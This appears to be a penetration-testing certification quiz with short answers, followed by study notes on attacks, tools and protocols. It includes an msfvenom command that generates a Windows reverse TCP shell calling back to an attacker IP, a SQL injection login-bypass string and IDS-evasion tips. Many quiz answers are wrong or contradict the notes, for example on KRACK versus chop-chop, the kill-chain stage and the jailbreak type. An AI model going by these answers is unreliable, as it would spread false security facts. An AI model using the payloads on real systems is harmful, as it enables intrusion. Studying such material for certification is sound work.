Penetration Testing and Cyber Security Quiz

Questions and Answers

The time a hacker spends performing research to locate information about a company is known as?

Investigation

Enumeration

Exploration

Reconnaissance (correct)

What is the type of cloud attack that can be performed by exploiting the vulnerability discussed?

Cloud cryptojacking

Metadata spoofing attack

Cloudborne attack

Man-in-the-cloud (MITC) attack (correct)

What tool did John use to scan for IoT devices using default credentials?

IoTSeeker

Azure IoT Central

AT&T IoT Platform

IoT Inspector (correct)

This is likely a failure in which security process related to the Equifax data breach?

Patch management

Which Nmap option must Shiela use to perform service version discovery?

-sV

Which host discovery technique must Andrew use to discover active devices hidden by a restrictive firewall?

ACK flag probe scan

What useful information is gathered during a successful Simple Mail Transfer Protocol (SMTP) enumeration?

The two internal commands VRFY and EXPN provide a confirmation of valid users, email addresses, aliases, and mailing lists.

What type of attack did Bob perform on Kate by exploiting her phone's loudspeaker?

Spearphone attack

Which type of attack can Mary implement to continue with her test after finding password hashes?

Pass the hash

What type of footprinting technique did Richard employ?

Whois footprinting

Which anonymizer helps George hide his activities?

http://www.guardster.com

Which wireless security protocol replaces PSK authentication with Simultaneous Authentication of Equals (SAE)?

WPA3-Personal

What is the first step a bank should take before enabling the audit feature?

Determine the impact of enabling the audit feature

Which tool did Lewis use to gather information about IoT devices connected to a network?

Censys

Which type of MIB is accessed by Garry to manage networked devices?

MIB_II.MIB

Which component of the Web Service Architecture did Rebecca use for securing communication?

WS-Security

Which rootkit adds code and/or replaces some of the operating-system kernel code to obscure a backdoor on a system?

Kernel-level rootkit

Mirai malware targets IoT devices and is used to launch which types of attack?

DDoS attack

What type of action did James perform as part of the vulnerability assessment?

Building an inventory of the protocols found on machines

What Google dork operator would you use to footprint a site and only show results that show file extensions?

filetype

Which stage of the cyber kill chain are you at if you are testing user awareness using employees’ emails?

Exploitation

Which of the following advanced operators would restrict a Google search to an organization’s web domain?

[site:]

Which attack technique did John use to remain undetected in a network and obtain sensitive information?

Advanced persistent threat

What type of cloud attack did Alice perform by infiltrating the target’s MSP provider?

Cloud hopper attack

What type of vulnerability assessment was performed by Johnson when he hardended the internal network?

Wireless network assessment

What service runs on port 389, requiring immediate action to tackle?

LDAP

What type of attack was Richard performing when he captured and replayed command sequences in an IoT network?

Replay attack

Which type of MIB is accessed by Garry for managing networked devices?

MIB_II.MIB

What encryption algorithm uses 64-bit blocks of data and three 56-bit keys?

Triple Data Encryption Standard

What type of malware are systems infected with if users are experiencing slowdowns and pop-up ads?

Adware

What NetBIOS code is used for obtaining the messenger service running for a logged-in user?

< 03 >

What information security control creates an isolated environment for hackers while gathering information?

Honeypot

What attack technique did Ralph use while masquerading as a customer support executive?

Impersonation

What is the fastest way to perform content enumeration on a web server using the Gobuster tool?

Performing content enumeration using the bruteforce mode and 10 threads

What attack did Bobby perform by installing a fake communication tower?

aLTEr attack

What firewall evasion scanning technique uses a zombie system?

Idle scanning

What type of attack is characterized by code injection like 'char buff; buff = 'a';'?

Buffer overflow

What technique did Steve use to redirect the company's web traffic to a malicious site?

Pharming

In the NIST cloud deployment architecture, what category does a telecom company providing Internet connectivity fall into?

Cloud carrier

What countermeasure must be implemented to secure user accounts on a web server?

Limit the administrator or root-level access to the minimum number of users

What type of attack did Clark perform on Steven after he enabled iTunes Wi-Fi sync?

iOS trustjacking

What attack did Boney perform by sending a session ID using an MITM attack technique?

Session fixation attack

What technique is discussed regarding scanning vulnerable machines to create a botnet?

Hit-list scanning technique

What is the attack called when an adversary tricks a victim into reinstalling an already-in-use key?

Chop chop attack

Which Nmap command helped Jim retrieve information about Ethernet/IP devices?

nmap -Pn -sT -p 102 --script s7-info < Target IP >

What type of attack is Joe experiencing when the website appears different and non-secure?

DNS hijacking

What TTL value indicates that a target OS is Windows?

128

Which of the following tools must the organization employ to protect its critical infrastructure?

IntentFuzzer

What attack was performed on Don after installing a deceptive gaming app?

Agent Smith attack

What is this cloud deployment option called when a customer joins with a group of users to share a cloud environment?

Community

What online tool did Clark employ to gather information about a competitor's server IP address?

ARIN

What type of vulnerability assessment tool was employed by John while scanning for vulnerabilities?

Network-based scanner

Which of the following Metasploit post-exploitation modules can be used to escalate privileges on Windows systems?

getsystem

What type of alert is logged when the external router is accessed correctly?

True positive

Which among the following is the best example of the third step (delivery) in the cyber kill chain?

An intruder sends a malicious attachment via email to a target.

What type of attack is Ricardo attempting by using a list of common passwords?

Dictionary

Which type of attack attempts to overflow the content-addressable memory (CAM) table in an Ethernet switch?

MAC flooding

Which type of malware spreads from one system to another and causes similar types of damage as viruses do?

Worm

What type of attack involves redirecting victims through malicious links?

Phishing

In ethical hacking methodology, infecting a system with malware is part of which phase?

Gaining access

What is the type of spyware that Jake used to infect the target device?

Androrat

Which regional Internet registry should Becky go to for detailed information about the IP allocated to a location in Le Havre, France?

RIPE

How do you keep your wireless network undiscoverable to outsiders?

Disable SSID broadcasting

What key does Bob use to encrypt the checksum for ensuring message integrity?

Alice's public key

What APT lifecycle phase is occurring when Harry deploys malware to create an outbound connection?

Initial intrusion

In CVSS v3.1, what range does medium vulnerability fall into?

4.0–6.9

What type of virus is most likely to remain undetected by antivirus software?

Stealth virus

What keys does Alice use to encrypt and Bryan use to confirm the digital signature?

Bryan’s public key; Alice’s public key

What is the best example of a scareware attack?

A pop-up appears to a user stating, 'Your computer may have been infected with spyware. Click here to install an anti-spyware tool to resolve this issue.'

Which Nmap switch helps evade IDS or firewalls?

-D

What will you call the two vulnerabilities discovered that are found to be untrue?

False positives

What attack occurs when partial HTTP requests are sent to take down web infrastructure?

Slowloris attack

What is the first step followed by Vulnerability Scanners for scanning a network?

Checking if the remote host is alive

What algorithm is employed by Harper to secure the email messages?

DES

What information-gathering technique does using the sV flag with Nmap best describe?

Banner grabbing

What is the type of injection attack Calvin's web application is susceptible to?

Server-side includes injection

What two SQL injection types could Jane use to test responses for a user ID?

Time-based and boolean-based

What vulnerability could be exploited on the 'Brakeme-Internal' wireless network with WPA3?

Dragonblood

Which of the following tactics uses malicious code to redirect users' web traffic?

Pharming

What is the tool employed by Mason to spread Emotet malware?

WebBrowserPassView

What service runs directly on TCP port 445 that Lawrence enumerated?

Server Message Block (SMB)

Based on the SQL credentials provided, what command is expected to be executed if the SQL injection is successful?

select * from Users where UserName = 'attack' or 1=1 -- and UserPassword = '123456'

What is the technique employed by Kevin to improve the security of encryption keys?

Key stretching

What tool did John use to gather information from the LDAP service?

JXplorer

What is the API vulnerability revealed in the above scenario?

Improper use of CORS

Which tool did Taylor employ to monitor and analyze her company’s website traffic?

Web-Stat

Which of the following techniques is employed by Dayn to detect honeypots?

Detecting the presence of Honeyd honeypots

How would you identify whether someone is performing an ARP spoofing attack on your laptop?

You should check your ARP table and see if there is one IP address with two different MAC addresses.

What is the enumeration technique used by Henry on the organization?

DNS cache snooping

What technique is used by Jack to launch the fileless malware on the target systems?

In-memory exploits

What technique employed by Eric secures cloud resources?

Zero trust network

What command-line parameter could you use to determine the type and version number of the web server?

-sV

What is the technique used by Jacob to improve the security of the mobile application?

Reverse engineering

Which of the following web vulnerabilities would an attacker be attempting to exploit if they delivered the following input ']'?

SQLi

What is the attack technique employed by the attacker to crack the passwords of industrial control systems?

Side-channel attack

Which of the following advanced operators would allow the pen tester to restrict the search to the organization's web domain?

[site:]

Which of the following algorithms includes all features Tony wants to integrate into his software program?

Serpent

What is the technique employed by Steve to gather information for identity theft?

Pharming

What is the cloud technology employed by Alex in the above scenario?

Docker

Which type of fault injection attack is performed by Robert in the above scenario?

Power/clock/reset glitching

Which of the following master components is explained in the above scenario?

Kube-scheduler

What tool is employed by Clark to create the spoofed email?

Evilginx

What can you say about Bob's conclusion regarding DMZ?

Bob is partially right. He does not need to separate networks if he can create rules by destination IPs.

What is the tool employed by Miley to perform the ARP spoofing attack?

BetterCAP

What is the command used for in the given SQL injection scenario?

Enumerating the databases in the DBMS for the URL

What is the OS running on the target machine based on the given TTL and TCP window size?

Linux OS

Which countermeasures must Larry implement to secure the user accounts on the web server?

Limit the administrator or root-level access to the minimum number of users

What type of threat intelligence collected by Arnold in the above scenario?

Operational threat intelligence

What would John be considered as for examining the vulnerability privately?

Gray hat

What is web server footprinting?

When an attacker creates a complete profile of the site’s external links and file structures

Which tool is used by Jack to perform vulnerability scanning?

Netsparker

What type of attack was performed on Ben's smartphone in the above scenario?

Advanced SMS phishing

Which web-page file type is a strong indication of vulnerability to a Server-Side Includes attack?

.stm

What is this hacking process known as when hackers are roaming around to find a wireless network?

Wardriving

Identify the correct sequence of steps involved in vulnerability management.

2-->5-->6-->1-->3-->4

What type of vulnerability assessment did Jude perform?

External assessment

Which type of SQL injection attack extends the results returned by the original query?

Union SQL injection

Which design flaw in the authentication mechanism is exploited by Calvin?

Verbose failure messages

What is the Wi-Fi encryption technology implemented by Debry Inc.?

WPA3

Which attack technique is used by Stella to compromise the web services?

SOAP injection

What technique is described in the above scenario regarding Louis's actions?

Dark web footprinting

What is the tool employed by Gerard in the above scenario?

zANTI

What is the first step for a hacker conducting a DNS cache poisoning attack against an organization?

The attacker queries a nameserver using the DNS resolver.

What countermeasure is the company using to protect against rainbow tables?

Password salting

What is the file that determines the basic configuration in an Android application?

AndroidManifest.xml

Which of the following techniques is described in the above scenario?

Dark web footprinting

Which of the following protocols can be used to secure an LDAP service against anonymous queries?

RADIUS

At what stage of the cyber kill chain theory model does data exfiltration occur?

Actions on objectives

Which file do you have to clean to clear the password after performing a penetration test?

.bash_history

What is the social engineering technique Steve employed in the above scenario?

Quid pro quo

What is the port to block first in case you are suspicious that an IoT device has been compromised?

48101

What is the attack technique employed by Jane in the above scenario?

Website mirroring

What is the technique used by Kevin to evade the IDS system?

Obfuscating

What is the CVSS severity level of the vulnerability discovered by Sam in the above scenario?

Low

What should John do to communicate correctly using PGP?

Use Marie’s public key to encrypt the message.

What type of vulnerability assessment did Morris perform on the target organization?

Credentialed assessment

Which of the following host discovery techniques must Andrew use?

ARP ping scan

Which type of solution is Heather using?

SaaS

What flag will you use to satisfy the requirement in Nmap for the scan?

The -D flag

Which file is a rich target during web-server footprinting?

Robots.txt

What type of malware did the attacker use to bypass the company’s application whitelisting?

File-less malware

What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

Which of the following attacks can be performed by exploiting the SSLv2 vulnerability?

DROWN attack

If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST, what do you know about the firewall?

True

What is the port scanning technique used by Sam to discover open ports?

Xmas scan

What is the type of web-service API mentioned in the above scenario?

RESTful API

Which type of SQL injection leverages a database server’s ability to make DNS requests to pass data to an attacker?

Out-of-band SQLi

On which of the following ports should Robin run the NSTX tool?

Port 53

Which iOS jailbreaking technique patches the kernel during the device boot?

Semi-untethered Jailbreaking

What is the component of the Docker architecture used by Annie?

Docker daemon

What is the technique used by Sam to compromise AWS IAM credentials?

Social engineering

Which of the following attacks did Abel perform in the above scenario?

DHCP starvation

What attack has likely occurred on Jane's wireless network?

Piggybacking

Which phase of the vulnerability-management life cycle is David currently in?

Remediation

What issue occurred for the users who clicked on the image?

This php file silently executes the code and grabs the user’s session cookie and session ID.

What type of footprinting technique is employed by Richard?

Whois footprinting

Which of the following commands checks for valid users on an SMTP server?

VRFY

What most likely happened to Matt regarding his Facebook interaction?

Matt inadvertently provided the answers to his security questions when responding to the post.

Which of the following tools is used by Wilson in the above scenario?

Infoga

Which of the following tools did Bob employ to gather information about an IoT device?

FCC ID search

What type of hacker is Nicolas?

White hat

What social engineering technique did Steve employ in the above scenario?

Honey trap

What is the name of the attack mentioned in the scenario?

ClickJacking Attack

What is the incident handling and response phase in which Robert has determined the issues?

Incident triage

What is the best Linux pipe to achieve grabbing all the links from the main page?

curl -s https://site.com | grep "< a href="http" | grep "site.com" | cut -d " -f 2

What evasion technique did Daniel use in his SQL injection attempt?

Null byte

What type of attack did Jason perform in the above scenario?

Server-side request forgery (SSRF) attack

What is the common name for a vulnerability disclosure program opened by companies?

Bug bounty program

What is the tool employed by James?

VisualRoute

Which wireless security protocol allows 192-bit minimum-strength security protocols?

WPA3-Enterprise

What attack did Robin perform in the above scenario?

STP attack

What protocol is being used in the unencrypted traffic discovered at UDP port 161?

SNMP and he should change it to SNMP V3

What short-range wireless communication technology did George employ?

Zigbee

Which regulation is mostly violated in the case of exposed medical records?

HIPAA/PHI

What type of vulnerability assessment did Martin perform?

Host-based assessment

What kind of attack is possible in the above scenario?

Directory traversal

What type of attack performed by Samuel is depicted in the above scenario?

TCP/IP hijacking

What tests would you perform to determine if a computer is infected?

Use netstat and check for outgoing connections to strange IP addresses or domains. Upload the file to VirusTotal.

What piece of hardware generates encryption keys on a computer’s motherboard?

TPM

What type of rootkit sits undetected in the core components of the operating system?

Kernel rootkit

Which techniques are employed by Susan for real-time information updates?

Webhooks

Which type of virus can change its own code and cipher itself multiple times?

Stealth virus

What behavior did Clark exhibit in the above scenario?

Data staging

Which Nmap command must John use for the TCP SYN ping scan?

nmap -sn -PS < target IP address >

What symmetric key block cipher is characterized by a 128-bit block size?

Twofish encryption algorithm

Which protocol does Bella use for secure data transfer?

HTTPS

Study Notes

Penetration Testing and Cyber Security

• A penetration tester is authorized to perform a penetration test against a website using Google dorks to footprint the site, with the goal of obtaining results that show file extensions.
• The Google dork operator "filetype" would be used to achieve this.

Cyber Kill Chain

• A penetration tester is at the weaponization stage of the cyber kill chain, where they are creating a client-side backdoor to send to employees via email to test user awareness.

Google Advanced Operators

• The Google advanced operator "site" would be used to restrict a search to a specific organization's web domain.

Advanced Persistent Threat (APT)

• John, a professional hacker, performs an APT attack on a renowned organization, gaining unauthorized access to the target network without being detected for a long time and obtaining sensitive information.

Cloud Attacks

• Alice, a professional hacker, performs a Man-in-the-cloud (MITC) attack, infiltrating an MSP provider by sending spear-phishing emails and distributing custom-made malware to compromise user accounts and gain remote access to the cloud service.

Vulnerability Assessment

• Johnson, a security auditor, performs a wireless network assessment, identifying a rogue access point installed within an organization's perimeter, which is attempting to intrude into the internal network.

Encryption Algorithm

• Triple Data Encryption Standard (3DES) is an encryption algorithm where every individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits.

Malware

• The network users are infected with Adware, which is causing their systems to slow down and display pop-ups with advertisements.

NetBIOS

• Allen, a professional pen tester, uses the NetBIOS API to enumerate NetBIOS and target the NetBIOS service, which is running on port 139.

Honeypot

• A honeypot is an appealing isolated environment for hackers to prevent them from compromising critical targets while simultaneously gathering information about the hacker.

Social Engineering

• Ralph, a professional hacker, uses impersonation to target Jane, posing as a legitimate customer support executive to gain physical access to her company and gather sensitive information.

Content Enumeration

• The fastest way to perform content enumeration on a given web server using the Gobuster tool is by performing content enumeration using a wordlist.

Wireless Attacks

• Bobby, an attacker, performs a rogue access point (evil twin) attack, hijacking and intercepting wireless communications by installing a fake communication tower between two authentic endpoints.

Firewall Evasion

• Idle scanning is a firewall evasion scanning technique that makes use of a zombie system that has low network activity as well as its fragment identification numbers.

Web Application Security

• John is investigating web-application firewall logs and observes someone attempting to inject malicious code, which is a buffer overflow attack.

DNS Cache Poisoning

• Steve, an attacker, performs DNS cache poisoning, exploiting vulnerabilities in the DNS server software and modifying the original IP address of the target website to redirect web traffic to a malicious website.

Containerization

• Abel, a cloud architect, uses container technology to deploy applications, verifying and validating image contents, signing images, and sending them to registries, which is part of the Tier-3: Registries of the container technology architecture.

Bluetooth Hacking

• Bluesnarfing is a Bluetooth hacking technique that refers to the theft of information from a wireless device through Bluetooth.

Wireless Network Security

• The old encryption protocol being used is WEP, which was designed to mimic wired encryption but is now considered insecure.

DNS Tunneling

• John, a professional hacker, uses DNS tunneling to perform data exfiltration on a target network, bypassing the firewall by embedding malicious data into the DNS protocol packets.

Digital Signatures

• Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian's public key.

Nmap Scanning

• Nmap is used to scan a network and identify open ports and running services, with the option -sV used to determine the type and version number of the web server.

Security Processes

• A failure in patch management is likely the cause of the Equifax data breach, as a fix was available from the software vendor for several months prior to the intrusion.

Web Server Security

• Common files on a web server that can be misconfigured and provide useful information for a hacker include php.ini, httpd.conf, and administration.config.

Compliance and Regulations

• The SOX law was designed to improve the accuracy and accountability of corporate disclosures, covering accounting firms and third-party providers that offer financial services to some organizations.

Vulnerability Assessment

• James, a pen tester, employs a service-based solution, scanning the organization to build an inventory of protocols found on the machines and detecting which ports are attached to services such as an email server, web server, or database server.

Cloud Computing Security

• The telecom company providing Internet connectivity and transport services between the organization and the cloud service provider falls under the category of Cloud carrier in the NIST cloud deployment reference architecture.

Web Server Security

• Larry must implement countermeasures to secure the user accounts on the web server, including limiting administrator or root-level access to the minimum number of users.

iOS Security

• Clark, an attacker, performs an iOS trustjacking attack, gaining access to Steven's iPhone through an infected public computer and monitoring and reading all of Steven's activity on the iPhone even after it is out of the communication zone.

Session Fixation Attack

• Boney, a professional hacker, performs a session fixation attack, sending his session ID using an MITM attack technique and linking the target employee's account page without disclosing any information to the victim.

Botnet Creation

• The attacker uses the hit-list scanning technique to create a botnet, collecting information about a large number of vulnerable machines, infecting the machines, and dividing the list by assigning half of the list to newly compromised machines.

Cryptographic Attacks

• The KRACK attack is a cryptographic attack where an adversary tricks a victim into reinstalling an already-in-use key, resetting associated parameters such as the incremental transmit packet number and receive packet number to their initial values.

OT Network Security

• Jim, a professional hacker, uses an Nmap command to identify Ethernet/IP devices connected to the Internet and gather information such as the vendor name, product code and name, device name, and IP address.### Types of Attacks
• DNS hijacking: redirecting website traffic to a false website by modifying DNS resolution
• DHCP spoofing: maliciously configuring a DHCP server to redirect traffic
• ARP cache poisoning: sending false ARP messages to associate an attacker's MAC address with a target IP
• DoS attack: overwhelming a system with traffic to make it unavailable
• Agent Smith attack: replacing legitimate apps with fake ones on a mobile device
• Clickjacking: tricking users into clicking on something they didn't intend to
• SIM card attack: exploiting vulnerabilities in SIM card software
• Phishing: tricking users into revealing sensitive information

Vulnerability Assessment

• OS detection: using tools like Unicornscan to identify the operating system of a target system
• TTL value: a value that indicates the operating system of a target system (e.g. Windows = 128)
• False positives: false alarms in vulnerability scanning
• False negatives: missed vulnerabilities in scanning
• True positives: correctly identified vulnerabilities
• True negatives: correctly identified non-vulnerable systems

Web Application Security

• SQL injection: injecting malicious code into a database to extract or modify data
• Banner grabbing: obtaining information about a web server, such as OS and service versions
• Union-based SQL injection: using UNION operators to extract data from multiple tables
• Time-based SQL injection: using time delays to extract data
• Cross-site request forgery (CSRF): tricking users into performing unintended actions
• Website mirroring: creating a copy of a website to analyze its structure and content

Cryptography

• PGP (Pretty Good Privacy): a method for encrypting email communications
• CVSS (Common Vulnerability Scoring System): a method for scoring the severity of vulnerabilities
• WPA3: a encryption protocol for wireless networks
• LDAP (Lightweight Directory Access Protocol): a protocol for accessing directory services

Network Security

• TCP Maimon scan: a type of port scan that sends a packet with the flag set to SYN, SYN-ACK, FIN, and ACK
• ACK flag probe scan: a type of port scan that sends packets with the ACK flag set
• UDP scan: a type of port scan that sends UDP packets
• IDLE/IPID header scan: a type of port scan that sends packets with the IDLE/IPID headers set

Cloud Security

• IaaS (Infrastructure as a Service): a cloud computing model that provides virtualized infrastructure
• PaaS (Platform as a Service): a cloud computing model that provides a platform for developing applications
• SaaS (Software as a Service): a cloud computing model that provides software applications over the internet### Web Service API
• The type of web service API mentioned is a REST API, which uses HTTP methods such as PUT, POST, GET, and DELETE to improve the overall performance, visibility, scalability, reliability, and portability of an application.

SQL Injection Attack

• SQL injection attacks attempt to inject SQL syntax into web requests, which may bypass authentication and allow attackers to access and/or modify data attached to a web application.
• Out-of-band SQLi is a type of SQLi that leverages a database server's ability to make DNS requests to pass data to an attacker.

Jailbreaking Technique

• Untethered jailbreaking is a technique that patches the kernel during the device boot, making the device jailbroken after each successive reboot.

Docker Architecture

• Docker daemon is a component of the Docker architecture used to process API requests and handle various Docker objects, such as containers, volumes, images, and networks.

Social Engineering

• Social engineering is a technique used to compromise AWS IAM credentials by luring an employee into revealing sensitive information, such as through fake calls or phishing emails.

DHCP Attack

• DHCP starvation is an attack where an attacker broadcasts forged DHCP requests and leases all the DHCP addresses available in the DHCP scope, leading to a DoS attack.

Wireless Network Attack

• Piggybacking is a wireless network attack where an attacker gains unauthorized access to a wireless network by using another user's authentication.

Vulnerability Management

• Remediation is the phase of the vulnerability management life cycle where fixes are applied to vulnerable systems to reduce the impact and severity of vulnerabilities.

Website Attack

• HTML injection is an attack where an attacker injects malicious code into a website, which can lead to the theft of session cookies and session IDs.

Footprinting Technique

• Whois footprinting is a technique used to gather domain information, such as the target domain name, contact details of its owner, expiry date, and creation date.

SMTP Command

• VRFY is an SMTP command used to check for valid users on an SMTP server.

Social Engineering Attack

• Phishing is a social engineering attack where an attacker steals sensitive information, such as login credentials, by asking users to respond to questions or provide information through fake websites or emails.

Tool for Information Gathering

• Infoga is a tool used to track emails and extract information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources.

Type of Hacker

• White-hat hacker is a security professional who discovers vulnerabilities and reports them to the owner of the vulnerable system, with the intention of helping to improve the system's security.

Linux Pipe

• curl -s https://site.com | grep "< a href="http" | grep "site.com" | cut -d """ -f 2 is a Linux pipe used to grab all the links from a website's main page.

Evasion Technique

• NULL byte is an evasion technique used to evade signature-based IDS/IPS by inserting a NULL byte (%00) at the end of the payload.

Attack

• Server-side request forgery (SSRF) attack is a type of attack where an attacker targets a web server with the intention of accessing backend servers protected by a firewall.

Vulnerability Disclosure Program

• Bug bounty program is a vulnerability disclosure program where companies offer rewards to security researchers who discover and report vulnerabilities in their systems.

Tool Employed

• VisualRoute is a tool used to perform a location search to detect geolocation and gather information to perform sophisticated attacks.

Wireless Security Protocol

• WPA3-Enterprise is a wireless security protocol that allows for 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive data.

Attack Performed

• STP attack is an attack where an attacker targets an organization's network to sniff all the traffic by plugging in a rogue switch to an unused port in the LAN.

Protocol and Security

• SNMP is a protocol used for managing and monitoring network devices, and it should be changed to SNMP V3, which is encrypted, to secure the traffic.

Short-Range Wireless Communication Technology

• Zigbee is a short-range wireless communication technology used in devices that transfer data infrequently at a low rate in a restricted area, within a range of 10–100 m.

Regulation Violation

• HIPAA/PHI is a regulation that protects personal medical records, and a violation of this regulation can result in exposed patient data.

Type of Vulnerability Assessment

• Host-based assessment is a type of vulnerability assessment performed by Martin to identify vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors.

Attack Possible

• Directory traversal is an attack possible when a web server does not properly ignore the “dot dot slash” (../) character string and instead returns the file listing of a folder higher up in the folder structure of the server.

Type of Attack

• TCP/IP hijacking is a type of attack where an attacker intercepts and sends spoofed packets to a host machine, allowing the attacker to communicate with the host machine on behalf of the original user.

Rootkit Type

• Kernel rootkit is a type of rootkit that sits undetected in the core components of the operating system, allowing an attacker to maintain access to a machine.

Encryption Algorithm

• Twofish encryption algorithm is a symmetric key block cipher with a 128-bit block size, and its key size can be up to 256 bits.

Protocol Used

• HTTPS is a protocol used to send data using encryption and digital certificates, ensuring secure data transmission.

Industrial Control Systems Security

• Connecting industrial control systems to the Internet can lead to security breaches, making it essential to implement secure protocols and encryption mechanisms to protect sensitive data.

Description

Test your knowledge of penetration testing and cyber security concepts, including Google dorks and client-side backdoors. Identify the correct Google dork operator and stage of a cyber attack.